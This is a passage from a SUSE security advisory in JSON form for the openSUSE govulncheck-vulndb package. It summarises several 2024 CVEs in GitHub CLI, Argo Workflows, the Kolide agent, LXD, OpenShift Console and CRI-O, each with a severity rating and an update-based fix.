"category": "impact",
"date": "2024-12-11T00:00:00Z",
"details": "moderate"
}
],
"title": "CVE-2024-53264"
},
{
"cve": "CVE-2024-53858",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2024-53858"
}
],
"notes": [
{
"category": "general",
"text": "The gh cli is GitHub\u0027s official command line tool. A security vulnerability has been identified in the GitHub CLI that could leak authentication tokens when cloning repositories containing `git` submodules hosted outside of GitHub.com and ghe.com. This vulnerability stems from several `gh` commands used to clone a repository with submodules from a non-GitHub host including `gh repo clone`, `gh repo fork`, and `gh pr checkout`. These GitHub CLI commands invoke git with instructions to retrieve authentication tokens using the `credential.helper` configuration variable for any host encountered. Prior to version `2.63.0`, hosts other than GitHub.com and ghe.com are treated as GitHub Enterprise Server hosts and have tokens sourced from the following environment variables before falling back to host-specific tokens stored within system-specific secured storage: 1. `GITHUB_ENTERPRISE_TOKEN`, 2. `GH_ENTERPRISE_TOKEN` and 3. `GITHUB_TOKEN` when the `CODESPACES` environment variable is set. The result is `git` sending authentication tokens when cloning submodules. In version `2.63.0`, these GitHub CLI commands will limit the hosts for which `gh` acts as a credential helper to source authentication tokens. Additionally, `GITHUB_TOKEN` will only be used for GitHub.com and ghe.com. Users are advised to upgrade. Additionally, users are advised to revoke authentication tokens used with the GitHub CLI and to review their personal security log and any relevant audit logs for actions associated with their account or enterprise.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2024-53858",
"url": "https://www.suse.com/security/cve/CVE-2024-53858"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2024-12-11T00:00:00Z",
"details": "moderate"
}
],
"title": "CVE-2024-53858"
},
{
"cve": "CVE-2024-53862",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2024-53862"
}
],
"notes": [
{
"category": "general",
"text": "Argo Workflows is an open source container-native workflow engine for orchestrating parallel jobs on Kubernetes. When using `--auth-mode=client`, Archived Workflows can be retrieved with a fake or spoofed token via the GET Workflow endpoint: `/api/v1/workflows/{namespace}/{name}` or when using `--auth-mode=sso`, all Archived Workflows can be retrieved with a valid token via the GET Workflow endpoint: `/api/v1/workflows/{namespace}/{name}`. No authentication is performed by the Server itself on `client` tokens. Authentication \u0026 authorization is instead delegated to the k8s API server. However, the Workflow Archive does not interact with k8s, and so any token that looks valid will be considered authenticated, even if it is not a k8s token or even if the token has no RBAC for Argo. To handle the lack of pass-through k8s authN/authZ, the Workflow Archive specifically does the equivalent of a `kubectl auth can-i` check for respective methods. In 3.5.7 and 3.5.8, the auth check was accidentally removed from the GET Workflow endpoint\u0027s fallback to archived workflows (the affected code is identified in the upstream GitHub security advisory), allowing archived workflows to be retrieved with a fake token in all subsequent releases until the fix. This vulnerability is fixed in 3.6.2 and 3.5.13.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2024-53862",
"url": "https://www.suse.com/security/cve/CVE-2024-53862"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2024-12-11T00:00:00Z",
"details": "moderate"
}
],
"title": "CVE-2024-53862"
},
{
"cve": "CVE-2024-54131",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2024-54131"
}
],
"notes": [
{
"category": "general",
"text": "The Kolide Agent (aka: Launcher) is the lightweight agent designed to work with Kolide\u0027s service. An implementation bug in the Kolide Agent (known as `launcher`) allows for local privilege escalation to the SYSTEM user on Windows 10 and 11. The bug was introduced in version 1.5.3 when launcher started storing upgraded binaries in the ProgramData directory. This move to the new directory meant the launcher root directory inherited default permissions that are not as strict as the previous location. These incorrect default permissions in conjunction with an omitted SystemDrive environmental variable (when launcher starts osqueryd), allows a malicious actor with access to the local Windows device to successfully place an arbitrary DLL into the osqueryd process\u0027s search path. Under some circumstances, this DLL will be executed when osqueryd performs a WMI query. This combination of events could then allow the attacker to escalate their privileges to SYSTEM. Impacted versions include versions \u003e= 1.5.3 and the fix has been released in 1.12.3.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2024-54131",
"url": "https://www.suse.com/security/cve/CVE-2024-54131"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2024-12-11T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2024-54131"
},
{
"cve": "CVE-2024-54132",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2024-54132"
}
],
"notes": [
{
"category": "general",
"text": "The GitHub CLI is GitHub\u0027s official command line tool. A security vulnerability has been identified in GitHub CLI that could create or overwrite files in unintended directories when users download a malicious GitHub Actions workflow artifact through `gh run download`. This vulnerability stems from a GitHub Actions workflow artifact named `..` when downloaded using `gh run download`. The artifact name and `--dir` flag are used to determine the artifact\u0027s download path. When the artifact is named `..`, the resulting files within the artifact are extracted exactly one directory higher than the specified `--dir` flag value. This vulnerability is fixed in 2.63.1.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2024-54132",
"url": "https://www.suse.com/security/cve/CVE-2024-54132"
},
{
"category": "external",
"summary": "SUSE Bug 1234230 for CVE-2024-54132",
"url": "https://bugzilla.suse.com/1234230"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2024-12-11T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2024-54132"
},
{
"cve": "CVE-2024-6156",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2024-6156"
}
],
"notes": [
{
"category": "general",
"text": "Mark Laing discovered that LXD\u0027s PKI mode, until version 5.21.2, could be bypassed if the client\u0027s certificate was present in the trust store.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2024-6156",
"url": "https://www.suse.com/security/cve/CVE-2024-6156"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2024-12-11T00:00:00Z",
"details": "low"
}
],
"title": "CVE-2024-6156"
},
{
"cve": "CVE-2024-6219",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2024-6219"
}
],
"notes": [
{
"category": "general",
"text": "Mark Laing discovered in LXD\u0027s PKI mode, until version 5.21.1, that a restricted certificate could be added to the trust store with its restrictions not honoured.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2024-6219",
"url": "https://www.suse.com/security/cve/CVE-2024-6219"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2024-12-11T00:00:00Z",
"details": "low"
}
],
"title": "CVE-2024-6219"
},
{
"cve": "CVE-2024-6538",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2024-6538"
}
],
"notes": [
{
"category": "general",
"text": "A flaw was found in OpenShift Console. A Server Side Request Forgery (SSRF) attack can happen if an attacker supplies all or part of a URL to the server to query. The server is considered to be in a privileged network position and can often reach exposed services that aren\u0027t readily available to clients due to network filtering. Leveraging such an attack vector, the attacker can have an impact on other services and potentially disclose information or have other nefarious effects on the system.\nThe /api/dev-console/proxy/internet endpoint on the OpenShift Console allows authenticated users to have the console\u0027s pod perform arbitrary and fully controlled HTTP(s) requests. The full response to these requests is returned by the endpoint.\nWhile the name of this endpoint suggests the requests are only bound to the internet, no such checks are in place. An authenticated user can therefore ask the console to perform arbitrary HTTP requests from outside the cluster to a service inside the cluster.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2024-6538",
"url": "https://www.suse.com/security/cve/CVE-2024-6538"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2024-12-11T00:00:00Z",
"details": "moderate"
}
],
"title": "CVE-2024-6538"
},
{
"cve": "CVE-2024-8676",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2024-8676"
}
],
"notes": [
{
"category": "general",
"text": "A vulnerability was found in CRI-O, where it can be requested to take a checkpoint archive of a container and later be asked to restore it. When it does that restoration, it attempts to restore the mounts from the restore archive instead of the pod request. As a result, the validations run on the pod spec, which verify that the pod has access to the mounts it specifies, are not applicable to a restored container. This flaw allows a malicious user to trick CRI-O into restoring a pod that doesn\u0027t have access to host mounts. The user needs access to the kubelet or cri-o socket to call the restore endpoint and trigger the restore.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2024-8676",
"url": "https://www.suse.com/security/cve/CVE-2024-8676"
},
{
"category": "external",
"summary": "SUSE Bug 1233812 for CVE-2024-8676",
"url": "https://bugzilla.suse.com/1233812"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2024-12-11T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2024-8676"
}
]
}